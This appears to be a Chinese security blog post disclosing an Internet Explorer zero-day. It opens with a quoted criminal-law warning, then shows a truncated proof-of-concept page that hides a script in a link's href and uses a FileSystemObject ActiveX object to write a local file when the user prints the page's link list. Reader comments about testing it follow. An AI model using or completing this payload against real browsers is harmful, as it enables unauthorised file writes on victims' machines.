以色列人发现的IE 0day

##不提供下载##

刑法第285条规定,违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。

刑法修正案(七)在刑法第285条中增加两款(第二款、第三款):

“违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。”

“提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。”



<html>
<body>
点击选项,选中打印链表列表,点打印
<a href="http://www.bl.com?zzz=dsasad
<script defer>
var ForWriting = 2;
var strFile = 'c:\\test2.js';
var objFSO = new ActiveXObject('Scripting.FileSystemObject');
。。。。。。。。。。。。。。
</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>

[本日志由 friddy 于 2009-03-15 11:55 AM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
评论: 4 | 引用: 0 | 查看次数: 5642
回复回复三点半[2008-09-26 09:29 PM | del]
又测试了一下,发现如果本机上没安装打印机或虚拟打印机的话,该漏洞无效.因为打印按钮是不可点击的...
引用来自 friddy friddy 回复
是的!你说的对~
回复回复glacier_lk[2008-09-26 04:59 PM | del]
像我这样经常把刷新点成打印的人危险了。。。。。。
回复回复三点半[2008-09-26 02:53 PM | del]
抱歉.没仔细看.成功了...但是要是想利用这个漏洞,还得运用社会工程学...
回复回复三点半[2008-09-26 02:45 PM | del]
测试未成功.难道必须有打印机才行吗?
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭